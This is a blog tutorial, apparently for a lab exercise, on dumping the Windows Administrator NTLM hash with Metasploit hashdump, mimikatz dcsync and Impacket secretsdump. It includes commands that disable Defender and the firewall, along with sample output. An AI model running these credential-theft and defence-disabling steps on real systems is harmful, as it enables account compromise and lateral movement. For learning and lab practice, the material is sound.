
How to dump the ntlm hash of user administrator

Using Metasploit hashdump

After getting a shell as Administrator, do the following.

First, disable real-time protection if it is enabled (this needs an elevated PowerShell, and on recent builds Tamper Protection may block the change):

Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Windows Firewall for the current profile. Note that this command turns off the firewall, not the antivirus; its purpose is to let the reverse connection through:

netsh advfirewall set currentprofile state off

Then get a meterpreter shell on the target machine (for example through exploit/multi/handler, as in the prompts below).

Background the session with Ctrl+Z:

meterpreter >
Background session 1? [y/N]  y

Load the module post/windows/gather/hashdump:

msf5 exploit(multi/handler) > use post/windows/gather/hashdump

List your background sessions:

msf5 post(windows/gather/hashdump) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MACHINE  10.10.14.X:2345 -> 10.10.10.X:49696 (10.10.10.X)

Set your session and run the module. hashdump reads the SAM and SYSTEM hives from the registry, so the session must be running as NT AUTHORITY\SYSTEM, as it is here; from a plain Administrator meterpreter session run getsystem first.

msf5 post(windows/gather/hashdump) > set session 1
session => 1
msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d132fb96a18c6ee06dee89f8effb8e06...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:97fc053bc0b23588798277b22540c40d:::

[*] Post module execution completed

Each line is in pwdump format: username:RID:LM hash:NT hash:::. The first hash is the LM hash and the second is the NTLM (NT) hash. The LM value aad3b435b51404eeaad3b435b51404ee is the well-known hash of an empty LM password, which means LM hashes are not stored on this system and only the NT hash is usable. RID 500 is the built-in Administrator account, whatever it has been renamed to.

NTLM hash is 97fc053bc0b23588798277b22540c40d

Just copy and paste the NTLM hash into the writeup where I asked for it.

Using mimikatz

The same preparation as for the Metasploit method applies. After getting a shell as Administrator, disable real-time protection if it is enabled (elevated PowerShell; Tamper Protection may block it on recent builds):

Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Windows Firewall for the current profile (again, this turns off the firewall, not the antivirus):

netsh advfirewall set currentprofile state off

Then run mimikatz with the following arguments. lsadump::dcsync asks a domain controller to replicate the account's secrets over the directory replication service (DRSUAPI), so it needs a session running as an account with replication rights (typically a Domain Admin) and a reachable DC; in the example below the host itself is the DC. On a machine that is not domain-joined there is nothing to replicate, so use privilege::debug, token::elevate and lsadump::sam to read the local SAM instead.

./mimikatz.exe "lsadump::dcsync /user:administrator"

You can download mimikatz from the project page shown in its banner (http://blog.gentilkiwi.com/mimikatz).

You will get output like this:

C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 1/24/2020 9:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff

The NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff (the Hash NTLM line; dcsync prints only the NT hash, there is no LM field here).

Just copy and paste it into the writeup where I asked for it.

Using secretsdump

If you have owned a machine and have the Administrator password, you can get the NTLM hash of the Administrator account remotely with secretsdump.py from Impacket. With -just-dc-ntlm it pulls only the NT hashes from NTDS.DIT over DRSUAPI, so the target must be a domain controller and the account must be allowed to replicate (a Domain Admin is enough). Against a host that is not a DC, drop the flag and secretsdump will dump the local SAM, LSA secrets and cached credentials over SMB and the remote registry instead.

secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::

The line has the same pwdump layout as the Metasploit output: username:RID:LM hash:NT hash:::. The first hash is the LM hash (again the empty-LM value aad3b435b51404eeaad3b435b51404ee, so no LM hash is stored) and the second one is the NTLM hash.

Here the NTLM hash is d9485863c1b9e07543aa40cbb4ab9dfd. Just copy and paste it into the writeup where I asked for it.

This post is licensed under CC BY 4.0 by the author.

© 2020 Prashant Saini.